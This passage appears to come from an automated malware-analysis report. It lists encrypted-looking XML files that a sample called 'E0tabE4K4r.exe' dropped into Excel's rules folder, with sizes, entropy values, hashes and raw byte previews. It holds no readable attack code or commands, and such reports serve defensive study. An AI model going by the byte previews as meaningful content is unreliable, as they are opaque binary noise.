                                                                                                                                                  Preview:<?xml.Mi......y.........U..6.f|.6.3.z/...>.uF..}7Z.....sI..&:".-..J1....Y......y...oR^@.......t;....G..Zj.g(C....Q5.w.....`DZ.a..8G\.E.x.{`.|..Q..yDi.?.yBj..)..IX..C.n...d.i.%..M...|5.....O..i..T"B.....0;....w2X.TY(qY.8..`..%)b1..N$E.0g...0E.x....h.....V.j..dk:.bf!/G...U&X....Q]_w.y&)..m.i...w..P...s..]F_8X0....Q..Ya,.j...F......_.q.f.....Z.Q......V.&p...H."..%j3.R.1C.5..i..#../.....]q...hu.\...~..a....Z....=...3.<oG..2.8S..l.Lq.YH.-c..T.n....CU.d..MOG .3..."+.7.F..dZ.C.D.zEM...B+..L....o.vF*....-....]@.h..z.bO....HPrIB....+&}.RC.%.R3.2...$.X{Y...|....z.._..bj..s...A.3.)..hV\.k}K6F.~..Pr#.8".<...[.;S.... [l.K.A.....;.....ef.. .......]...\H6.&s....f......e..^.8p.b....n..}.G.f.)..s...Ov.x.8...).%...\.pCc.M.QQE.o..C...=Y...d...2..5..aL.h....p.(..k.J.PM31....6=..j/..iX.......{w..i......_.i..@$.-...z....&%o.%q.Y....r..R......'...M..).ySx9y... ]..'...1...@g...Sl.q...^J.5s.F.y'..Ai)%..i....B...k...LF.fs.j.y.J{:f...)\2h.....I..Ev..u..,...i`.>}..b..{.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63053v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):980
                                                                                                                                                  Entropy (8bit):7.803534283672462
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:P8DkKmEWnuNRmt3LK4mHVzIfaiShmSHx+C/tV2bD:P8DkKmVu7engZhuYID
                                                                                                                                                  MD5:5758455EF53B7358863298B079BAE1B2
                                                                                                                                                  SHA1:9488F7D8387B044535266DFC8E0C82020C83A09F
                                                                                                                                                  SHA-256:A21A6207273AB32D5DCDE73576FC8F4DB2618C939A7E39DD0E3FCDCECA0FF906
                                                                                                                                                  SHA-512:CC3EF3399E0FA0F80C07F89174D1DCB0B85754DF5B3F8ED7F612B69A1AF9B5294EF0772D948AE1FCFA5630C070B76566E544302195EEAC613ABCD9BE0787CD97
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.Y{...=..N.I.o.....d..`...t!A....S..k.8,....Kp...[}oV....|...X_n..&...._.O..<..Pt7=.......w...^.p_J..^;.u."....>..A6..$.....7.Y/.Q=..9.rb......a0. .`...-(......9bfa.v..f(..J..nVf5.....D`..3...l..).?.O... S...,.J.oU>.y`.g..I.sB..X..y..'<...'Dk^..\......$.......k.+xA_..c%..}sP@O...S*.P:.dy.A.W.^}..hsP.Od.]...r..]..=.Rw.....&a..m.o.3....6.:..!."..U.PD..~.s.e.:Y....G.D.9...k.........8...'......."...$..EI...........x.....='...eU.eRa.+k&.g...........=...>.8.'$..?T....$..B...u.,...G/........&...b....\..M9oHP|f..e6P{.?.{.ikb..^.Q?...5+.cy.R.-.*.~....../.q...../....h,..K-.D.!g.1..Us.<O?Qy.o.|.a5..z....?...*.[{..-.?O...^...&.u`.b...Q.S.....R..q.`.a.....0.f.Ri.......)..ON..u.Y./...v.t:.z..>]qX....s5{..p.c...t.$...k....~.E..2l|..;77.u..P.i.\.....s{........b..y..B.t....*-..7.i.|..g.~/....._...m-...V.j3o.Z......j....c.w%9^.....d.X....2.4._.h.w...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63054v5.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2404
                                                                                                                                                  Entropy (8bit):7.918036131608609
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:LHbeeo2VD+tZ+KBKkC8kUKtSPLQfKnj/SoEb/73TAzw2pD:Lw2h+yi+EPLGp3TAkQ
                                                                                                                                                  MD5:E361D6964FBD3CC714BBA2B45EC3B0A7
                                                                                                                                                  SHA1:6880470430E8E1082E5E29040A26493E0A93ABCB
                                                                                                                                                  SHA-256:D1F82FCA00D1B05263461BF699A08712D942366C2309FCDE2890A0BC4F4ED607
                                                                                                                                                  SHA-512:9ECB01A28B23DE0BCA2740F2C03740D8CAA2F80943EB3CE78D774C94F5B69147EF1E126444F66214CBBF9100DD4A0604D5F154B622AC74AB0A218F930982D3DA
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.#P..P.Y...!....-...E..o...fu..^.lF.!...A..^...6..v...t..Ib.....S.ZO.r..)M._r.o..,z..i5.d...~.F....U.-6,NE.z...#.%..m./..._w..sby..N....d.O......oN.1..KWy.iu........K.Z.-.Y...x@.K...*..L....+}Z......p.mB=..P...$...;.;v......o..,..^=/.../.{........)0."..A3>.2S...Z..Xq.._w...v....X..e.\...g..."8....6........A..ft..sS.J.81Q|..=.&".....}rER..P.[..p...A.-...v.G:O..\^2?..0...".B)f....GU..0.....D.{j...Pyu..V;.;iKG..g.42.K...r..ehc.y.....o..i.....=...3..b...H.^..A2..'_q:...D.14...)....%ZajG59.._..qEjV..,.$..Yq$0..f.ck.y].....0@.....Wd.8..D..%...hxx.B....]sF4...'$D..A..j..o.W.2.L.5.F0..uLB..?.h.......9Jo......{..[....Wj.....f...h....V........8.......+Up7..m1Qp.z{....b.QF....m.._m.q'..0.Q...i?Bi..x.....SQ)..$.9....6.*......<........NZ..F2..=..~....e5.X....cs:.I......=nfbq......ri..Y.........>.......C..N.cl...WrL...P".u..BQ.z..1...&....Y..._....r.....G....D.*..b.G...."..K...+,9...2.3Y.{P.W....4..9p.;. X.3..t).r..Q..$1.)..ht+...?..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63056v9.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3203
                                                                                                                                                  Entropy (8bit):7.942353125902596
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:RexWFIh84MsGzbEhTqEpRh2NaQeQ98y8Dbvc:Rhy6vEwEpRhS7uHb0
                                                                                                                                                  MD5:51AAF2338BEB416748B9FA4460E67A29
                                                                                                                                                  SHA1:E261C5F9F58864ECD77B2B50B6503B0C88A1BEA4
                                                                                                                                                  SHA-256:5523B5097D5CAD43E010DB6A3B5B7054DCE167EE4659A1B7FF5C66D417430CA7
                                                                                                                                                  SHA-512:33DD813013BFF6533A0BA9403854CB4CD2BF86B5D7E6D0BD298BDACCD57667785460824740561C4075DF46A5DA2A019A319C29ACCB1542EF97B76F4CCB390EBA
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmld...w.d9.7F.J..u.s...0ge.#|....OF.|4.@.-....~x......[...."..X.......kf5....A.W.o[.^....1+V....L.....L.;....d..S>...!oj.0#.....c.<...`..4..r..p.c{...-.....:....j....e.|.$q..Z..f..Nf......\.@G2.....C.c.bY.|).5...7....%.HN...hf.).."..pZ.9v...Qg.....i..8....v.V...+\.Px....LCT....{..QH0pVm.Y...`m....e.........G........ ........G.l.j.K ._t n...h.G....#w.>.c..nM.....W.l'...O.{X+*._)...#B...W[.._.Y.........3|.G.9..D...Op....!q..z.i.[.Z-.[d.".TZ..E.$..w.1.g{.[>3....u..,.%6[.\..i3....x....d..M....u..&.@.9?..#^.....<..M*..8...+./M.....iu;.....7..9Y..N+..t.8....c.6t...N..f.*".\L.x...[.3.9IBq..~..( K..c|18....C9..+!Z.....cP...k.=5....T<.....(.M.#^.I6...+$.W&.p`L.i....R.M....LY..[.^...a.8...1.4#..xu1.y|.@............a..PF .2...(.8...8...g..}O..v.Q.....hO!.a.....s<..G.).n.#...u.G.$....?x....H....=h..Y..A...l....c.{v..3(u.M7. S..L...N...A...M..y.y`....2..T....G..,..A.(.+)o.`.j@.|Q...YG...A0..&......^...v...d..y....XlN.NFh....l...lg.b.$EP..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63057v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2512
                                                                                                                                                  Entropy (8bit):7.930011994861348
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:gfDv1Xhckm2rKHli0InF8PpL0ANSgM8GPxnEfthV7tOErxKTas/BnbBfSD:6DNE2rcs0IYeAN7qytjxgm2Zbo
                                                                                                                                                  MD5:99C9ABCA592FF4FEA90DEA374F5B083D
                                                                                                                                                  SHA1:7D64CFA1DB82DFDB9D68CAC60B9C39A262E9F1D9
                                                                                                                                                  SHA-256:C3418ABB837E9184961634F95F88022F560D30A1BF4D386AE68F88498031F45D
                                                                                                                                                  SHA-512:0AC60282036FA293E44673AB69937E596CB2045874C19E770AD0525B66567C55C1698A5173475B80E481E3A398C99814EA0BBB4F29823A1D9B470D30E3E10615
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.\7..@...E.c..Z....7...FY.....k...]..}.n..L.~<-.j..C8nV(D*x.....'+......?&...pH.\nZ.:O........z.w2..C.....j.H.~....jj..q@...'l...2F06r.=B.......t:.F.Y3.....L....-..8.'.l..Z........U\Aj..g......K.....y.....`K..Q...Mh.)!...,......E,..M*..aH...wl...,...'k%..Q..AN..~....&l.|.!]..w..!@...)8..._.\..F..........)......k.B....Ez..z..o.x(a.ai.vNc.%B....O.. {.....5y.I7D..O._u.b.....N...H..m%N......~....!.....%....Sh.....m.....Z.K..x..p..wN...p.x...;.J.....j.....4..(..Q.fQ=M.~^...I....9^D.!.4l*T....Ft....(.:.F.5.eg w.}.n..N......]6..y.x|3...."1`:).%.x.E/.E.r..V...n.;n...{.E.a:TH6e..jL......#...|..#..."<..Be....N..x....t....TT...Ds..4m....!.@.......c...].i.s..CGI.#..... ..}v..!.T.Z.9Cr..]..V....U...~...Q...f...@O.......x.G.....m..\Y...j8AhX.5...5H..?2.2i......)eMq~O}.=N......Iwvqy.XE..uCmf:.>`W#..FK.b....?2...lO7>B..r.......SDT.vb...k...8........<H.+\9...d.DK..U&R.kJ2r1...s.h?6.`Pk.......!.9.'&.z..(E.L_..9{3I.R...I..@.m..`.U.....K.VH.*.x..[#7..h.e

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63058v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1247
                                                                                                                                                  Entropy (8bit):7.806594187401731
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:DoPgZwhs0YsPrMgLUJSkGUgaE2EnRSBhTP+TJG95PGVmYHo2bD:0oZw+0jDfLUJyaoYdPaauEYHbD
                                                                                                                                                  MD5:AAE09B38A8E540234AE655C015DED8E3
                                                                                                                                                  SHA1:345AC0D5D6458916B61774056DE0825F40D6B00C
                                                                                                                                                  SHA-256:E2681AA931353051CA1885AFB2DF38116D346C690BB3ADE60E3F1F61D97E8244
                                                                                                                                                  SHA-512:751F8B8B6A5D5D34BE461A41D3F76C7715DBB4776E715C59214365424E884F733DF773EB1708519FF648E2E8A9EF3E75A1C3909396F7433B9B1AFAAE90BFC1D3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlI0.M.&....U......A.w.Gt..N...VL^Lj:.).....JR.a..I>.vKs.=.+.i.+.0....lZl.j..4..........d..).j.$..-.....J...(pMz<....z......Sp.Wq....-.*.....7.... B).7.S...L...........V..|......7..WB.o.2:B]...0.....D00...p0}.K.l+.O\...\...?b. .3...o..DlU.....E9/.".O...jS.T>?@.jP.~.E.[BXA..8(.Hsc..Z......:.q..-PX.Ee.y..$...s.q....] .X^..i.g.?.7....&.DB......&.x|`.....Q.sN.!.hV....3..........ixB.sB.|.z..+9.3.c.F<.s...J......A.s..G`.+g0......v.^,...`e..[...3>n..d`&O..m.=ZAa.-......=...p.e..?.C...B.....P...H.o....A@.a%x.A'tA.-5.....}~K.?..t..........{.aD....p. ...eJ.Vte.`L......DE.wa...L..s...L.s....w^.P......j.?...L@....)../.g.2O..m/S.r.8^4...*\.N.lP.M....>.E.(..`..V..i.....[..6.F .8....&....a:[.......(jXe#..)H].foL..0....7.Y.\y....71zM...!..</..E].vW....+.*.........*WG$v.m....S..-TJ.....z...q(..x..[...g.M.|.~.../aR...^W.w./..yq..P.u......b.|.L...[...OA.{.\.n..-c..-.K..3...t.|....rly.....z..6!:.@....V..=.....|3c...{...D.W.D.X....4.0...q......"..9S.....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63059v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):950
                                                                                                                                                  Entropy (8bit):7.752584119220685
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:szgqUSik1w5mR4sOYUOMoersOv35bnJFDkV0ZfFV2bD:cgyRZzepvJbnfDlZfQD
                                                                                                                                                  MD5:DCF421EBD454B3502A95F436A4DEC85C
                                                                                                                                                  SHA1:8C73E2C77EB513E3B7DC6DC23BC2856F2483934D
                                                                                                                                                  SHA-256:A2AD21C423F91E72885BBA97066DB5C7D755BD86D7A2193DA75A1E39ABE1B6DB
                                                                                                                                                  SHA-512:247E0ACCBED1A48321822E8DCD18FA665F3530A72D84F9924ABDA0AA9FDEE494C171B556360C2B0F843BF3AF5EE6158B3C51EA6570876C27E4A47DFBEE8E277C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml......t[..|t.:$$.eR._.fJ....;..}..V.......p....#=..Hw...J.....$9.}Y6.S.2..~..-..ar....m.|,.L=.4.....].-..c..["K..... .D....Is.U.....`..(.. .......[O(.f...>.V.6#.&**.(..jp......'kV..U.lz...b..9....Lm. .*fA....^~.z .....j9..\.Dm...k.h .-DB..I.96....A.~?.b\.P`..8e.u..U._....g(.S.M.A6.m..tmj..Pa.i..C$W.AY.j........2...$r...*...Y..C6..)..e{.....T[.Q._.q-.G...C.~.$Q..J.q.......6...~.X..HH....<.)...UT..u.....!..@..&.j..Vg......*f..j.N....N.......e...x1.r`m..=..........H2~.~i.1.i.M.)..3....e.....=_e}h..7...."..vwKY..(h..!...'.3.6d..9...,P......u....s.....#9Q+.0.......6..^....g<%a-g=@..4. .<.;u.Rz..1`.]bi.m.V...}.a.?..T)..O..t.9..:.-.......a.N.P.......h....M..H...b....Y.j.A._!X..u...<.o..].v..e)..[....0..?.....3T..&\pQ..V...Y.K;.`.2_y?..'<U...".3...&G..P<yf8..j*...=.S..:2...+./qLZ..aw...~0.O.v....u.4.........<..Fx.w..tY.bmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63063v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1125
                                                                                                                                                  Entropy (8bit):7.834886956604712
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:UtGAKaCdxRBdEB7Yh5xpdodUj7KDPx76PQYNeMHaHrkTJbQ2bD:mTKzjRBhRptj7C3YNj6ATVDD
                                                                                                                                                  MD5:FD6DF501DADDE90B35A43A11AFBF48BA
                                                                                                                                                  SHA1:258B968EB995BF501B223534127D4B42DD9B39AF
                                                                                                                                                  SHA-256:8DB2692E53CD20B61AD7C00E79E5568C8A4A7626BDDA32DEA760ECD4FE0A763B
                                                                                                                                                  SHA-512:AC75A34864A9EFE999DF1065817E8DAA668714815DDFC3D7AF51709012DCD2DAB77120CFDBAD825DA7EFD1BA778DA0C7879E836822A96F395E45325CC60ABA2B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.k.|.yAq..`.MB[..U.q.....wfj..;M......s <...%a.E.0.Q9L@...t...I...m8.+...|Y...<!p....G..,}......E.+...D...V.1..zS.(.T....y..r.<."T..{m...S1.../.kQ.U.w.85..../w.p.D.X*....^h..eH.i.COI.U........._x.k.bWvt".Js2}...`..=..).U..._V.-...wY....&Ew..Y.p./O.k....Ql..v.)oR...g2.I#..l.8...?.X.7..ngJA..t{.g:...RY`.bt."..H.....r..d......L..U.jf..h.Y=]....F?...\9..iA..e.b....A.'...Z(J...$ai.$".|.....e..Z..Q..U..b........1.yl...U....~.k.(....'...1.}....DJ.4.....MP.r6.~I.%2...;..B.....a.JB.IF..`2. 81.~..j..u|..0]c..Xu..^...|GjJ....Nb.V%..M.f.>_... Z......g..J....@"i%.U..%...%..=..u..d.....R.........6.F..Eo....2y...h.... .v....K=.a*......T....q....l.?....,...............85/`|... o...zAIR0u.|..<....d...Zb.l.+ .g.+/....mX...B.<*...(....Y..#..!.-U.O...^...b.......;<gY./..............V......,M......I.}..i...B.....+b.@.$c .w}.9.i@..e.&.Dd.q......dU,q..GlF.n;'....b#..w.ZK.....nd.l..y-.0p.n.&.Y-......];&..MY...O\.....?.P*...CJ"....w...{Z..6.+......L.E.Y.....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63066v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1121
                                                                                                                                                  Entropy (8bit):7.790001575021718
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Kl6bIShaEvFG9pc0L7ua3bx1zoqNLce6XsynUcV9xh2bD:rIoevXMqNLLUsyn5VH6D
                                                                                                                                                  MD5:5871BAB1BC143FFA8BB483700AB025C3
                                                                                                                                                  SHA1:2560616CCA6B33194EEF39BC42970258BE0D604D
                                                                                                                                                  SHA-256:5FB3B4869551DC0F770B21C40F73F70ED49CD27736F961D5D75C6D46D9FEA535
                                                                                                                                                  SHA-512:FE13542ED9F338F1F38B2E300238302313F406BE7C20092FB6C4372AD8E368799D397EAA1484A38AE91EE83FAD381FE3ECE4707BE3E54B7C44EBDBA53CF6D9F5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml6s.L(..UJ...H....Tr..c...3.\...m..F....?..@P}v..*..T..A].B%)..O.....2...&....9.h......I..[y..+ss........5..6t...+...P.}.?.5N....4.......Q..~.}....57...D..Y....V.`.D.a.5......:[h..qr.$..M.a.4..l..{\....<Nz]..?..xC..>_|..2zD.....m...............3..R/(.b.6..S.2!..U...U`..VP.Ox............{l..C.L.-.....6Z...A?j...j-M...........;/.G.b7..ya[dxC....k.d...].P..z{'AU..GF!N....P..}..R.I.~c....c'6..k..M..k....H.u...X...J.;._.M...C....}..*.@..|...FM...gM t...n.s....{.....u..\...v...bj+...=..=...........l...m.f....{.Yyn..,20..{-;...J.......d...+:.n.tk..L^..K..d~]8...b.+md.RC/.....v...+36..wO.*xG..."...o....#b....qy..9.KT./B..]t...P....N..w......&9.q.....?6....Y.!......J.Dh$[.L>...2.!~*..BA[....U$V..~..#uxC.P.cM.kom...T.,.z(2..Pav..q....a7..MF..".3.Z0Q4.]BO....8.......n..."..LAp."Y.";.....x.`wh.4...........aj".~>M..Sf...N.....+&.V+.b..t.O...]W.UD,....p`...cdZ...).....C.H7..K.\.Ws&q.N...0..U.k6z.>[D..Q...1.a.Q<^M.d../....F(.~.@....U.O.@....5#..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63067v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3109
                                                                                                                                                  Entropy (8bit):7.944375833417011
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:Y87o0I/irmJU2upncLM3aMXCrYcPFB8ruJNC8mm2CfA3j0DBLRZADtNLZB7YYRD:YnDqqUpncLiXi8ruJYVRCIioXZBnZ
                                                                                                                                                  MD5:31D9D3946C974B0FEA8CCDA4747DB6A7
                                                                                                                                                  SHA1:21BED6808E543800F8B7B0501FFE45EC2DA3F82E
                                                                                                                                                  SHA-256:0337F7D2C663C9DA33AC445258DA7675137DAFC98CE222A2EF897D2AF2D899DD
                                                                                                                                                  SHA-512:DF9D9A8B3BAE1B560EA78C182B55B8A82EB3676BC9F71E26F50A1B2AC21D709BDD385F228D6A7560A6C8921BAACC0384C575F79552EC34B5312A4A6B7FDF91B3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..8.J.S9.o.B........d..../.O...s..4.....f6..u....#..:A...={SZ..38..k...[...-M...^H.....c...P..;..9kNYy...Mn...$G.x.;&..._.....6...jx.M......U,.E....t+F4.o1.Vq.=.x....D{......u....O....^...ZB.q.9....W.......?.N.}dE..Ov..r.......2[.A'.cz.=.u.XcCn...V_.1"...gR.>.N..`..9U...J.3..<.<.?.Q]~e...v.!;.=;.....HS. 2.iX=y.^....H.H..W..h^..}n.<...{......x.(..2.6.n)........k...A.a.HG.|.j...c..r.sL....Q/[.;.`...t..........e..S.vm.*.Y.e..3...a.5.Bc.g.....q...S:s...a.....t[^.rpk...?.R>e........9...j.8..._w..".j.?.Z.p.Y.w.IG.7..W...;.t..1g......R.....a.d7.b.2j.<.y....l....`..9B.X."..0(....>.k..q.ZcV....;.....s?.S$.h..B.._......u>........RB.s..^...Q7....ke..>Zz..LU?n..s.........2T.X..De.....*E4!#].u../.......\ZKt.3.<-V..I.Yxb;..7;................;...o.xF.........i..p...[G.1..D......D...'......f.m.Z...'...s.........8..@.N.9C_....(..k/....V.:.1.`..;3..BH.............{q.......!.M....`.).0...X.g..s.t.6.`...).w....I......".......r.....B.82.....|u.c..T..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63069v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2126
                                                                                                                                                  Entropy (8bit):7.9213222724748755
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:k1yE0K7nhbnvuahK9olVP1Wgd0Tze+Xy5cF7zEDKyfVqD:k1/rxuahyituTK5GwGf
                                                                                                                                                  MD5:333669CC2D35D9C5C7D3525F3063666B
                                                                                                                                                  SHA1:F4740F4C28B2A3AE8FCFBEE47BAEFBC5AA53733C
                                                                                                                                                  SHA-256:73418934111B60E88D4D14D7BD8E68B21782CEEE324FF0B7550FD9472C5E08E9
                                                                                                                                                  SHA-512:863C78805C43FBD0905A51D9C24EE107EB47309456BB9FA88A4798AC0E94E3A188077A877ED1F4EBE047EE9818B4512C933A84474B93D8E9856481A60933A5BE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml3..V......$9.P.{{jb.#...J).%h..S..P].*.h....q....iUn..J9.LV.-v..W|.2K....r.>X.S#...oq..`g.".I0.......[])<..wU....R..e^......A.yu.K".?....6....L..f..c<f.(....s........V..\Lb?f%.L...4..x.."..[?.%.....K..............u. 4.(.\....;..N.c..^...o.3i.^.m.[.:[P.q..l.i...2..;.z..yc.c..6.V\5...t.w .1E.~....u`.......(..P.a....>9......O.`.+..JU.._~.;s.AB(..h7....i..H..a.Ce..#/.D+..F..J#..5....r..>.0B48w.L...YMs..T.]...........V.....7.k...V.P...N...S.S..(...m...;..F2;d.i.R,.)..J.k......5.X.Xs.Gj.o...{`..-..d...A.}.-.......(f.@c.^.p.{....n..-...e...s.p..|.t....Cw....e..T...f..o...A/..`......}.q.B.(-....%..}...~T6..Q.6.xM.j.3{..5.p.g...t......=.?..8.)........B>...J..@..A........L.3n...........2Q...}ts.W..c.Nm7?.S.@.yZa......_.7Dw.#.iw...D..*Qx..#.q...t*....`}...o.A0.]dC..(.3..r....,.[......X....>.o./..k.?.`..g....\I...i.E..$.i.t%.Y...R..#.Is.'....-..:R.E@-..<.W.V.....4..H....l.@1.g... h...*_i....Q.d4^....PP.....n1Oi....%2D.d......j.VWF.O....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63070v5.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1387
                                                                                                                                                  Entropy (8bit):7.872052083556554
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:F/uYZKjH/tPB0+S/YdvDni6BXa8qVg8grPiOJon+9Re2bD:F/x8jH/t5JS/Y5i65arVgxmVn23D
                                                                                                                                                  MD5:069EBDB461B46815AABD03C290C87A21
                                                                                                                                                  SHA1:3D9A1290142AB5FE64991D457D24F528781F5EB5
                                                                                                                                                  SHA-256:61DE3D45447EC910CE1F98ABE5DA35F8D378EAC03270E2D261BCD0F0607C678B
                                                                                                                                                  SHA-512:B4D4A04E73FC68DED00BB5E343CBAFAF52A28351C4123411C982AB451242C72D0E540EBADDA74A07ADC32D223A22C19355B3E6C20D047724C32507AFA845AE75
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.pqE.aj..y...q....,.vf.nc..Z..bS.O......s.j..t..d.[_i&1:..y|.#....?j F6.=e.... .%.6..L.Q.u7..xb.U..Su.....s.S/.g....s.P....-.q:.s_4.q...+n....`..!...s.2jM.j.M..&...B%...o.K...U.-'.`hR...CE.!.M-e....z.9..O....H..' D..b...?.N.|.._.....:.....>....E..)..F&j.......;P[^..O._..W..Q.@.?.}{E.......%t.%....`I.f.........yu.U....Q......wY.#.!9..+...E55{...hp.F.E.(./.....s..[\w,..V.:h.,.2...,R....PY;...X-*.qX.6Q.[....7..[......O..m.. ...K..{.<&.8.......o )...H[3..+>`8W..E.`3..|...*J.u.=.f.}...*......5G.m...M..e.<.RoK!.ug.%F.l...H8...........'..eU..........+...Kp.57DUc.< ....Z..2.#..\T 6.....J......[._..bK....._@.aa.`...Nw=....U.......\..p....'1..S.G.......'.....D...8...#..x....r.....k...)Q"...C.GJ......4...%3.q..N..E. ...|..-.HW..Z.......'..%L....39.R..2..8...`H...w.br..6...t..AGxz.....l.p......D...\.[..o......iZ..}{..?|~DZ.K.M>.6k_b.M.^......4.37.....Y"W........[.......A".X.... ..f)(..?..r..i......bS..fBz.....T$.HE.j.*......#..=.,...O#...(.MmGEE...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63071v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):754
                                                                                                                                                  Entropy (8bit):7.686509855816978
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:LpUagPijfWeHvCxISpr5+hW3iZSTjlQ0Tj/gkzgXb7+qBYMu90TaHlhFo7BqSUdV:LptgPijfW+axISrV3iZaQ0TrgkYXuya5
                                                                                                                                                  MD5:94311DADBFF7FE007DB2A0B65B817BA5
                                                                                                                                                  SHA1:C487221DCF486D66D3A02DE6D69538472A59EF4E
                                                                                                                                                  SHA-256:45127C4EC22CCC7B0B97434D75CC6EAD3A9AAC31A4F85E27A866F8CC6326A88D
                                                                                                                                                  SHA-512:B178DE3231874759215E15D0B5DC84D2A01323EE81C500A1FDA306AD036576A5D16BE6124388586207FE5D84329765113C0D03D41B43C65F88C714265CDC7FF3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.l.6.#m.&..g....#.Fac:..c......R>_j6C)....x{.3..Q.v......2A*.........z...=S.&.{..pP!.h.../d...C...wU...@.P.6...lT....X....6:..$h..~.p.[.{f....0..Ip..P....c..q1..n...hGGw...<87. .w.<_h....2..n`4...a...s..*.... ........9o[..H..B.P.'..&....[...!..>{.OZ'v.".S{.....\.ABi$..X..LqQeY6v.2..b.d...[.{...]..-.o._6v.V.9g.)8v...a....2..J.lI..J..#...p......8...z!)..X...M..g...RU...3.HIe..G......tX......2,....-...V$I..Q.....=..<..R.$.b..{....$}#..[m.....S~)(....k..'...j..>.|.k.........INb..E....?.......6..G..x,..R.7m..UUv..P.....k....u.?.t..Q.]iL...z]"o...lw......)...~...f.2gM..~]..:._...d&...............b..>}..c...A...J.......H8...j...|...n.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

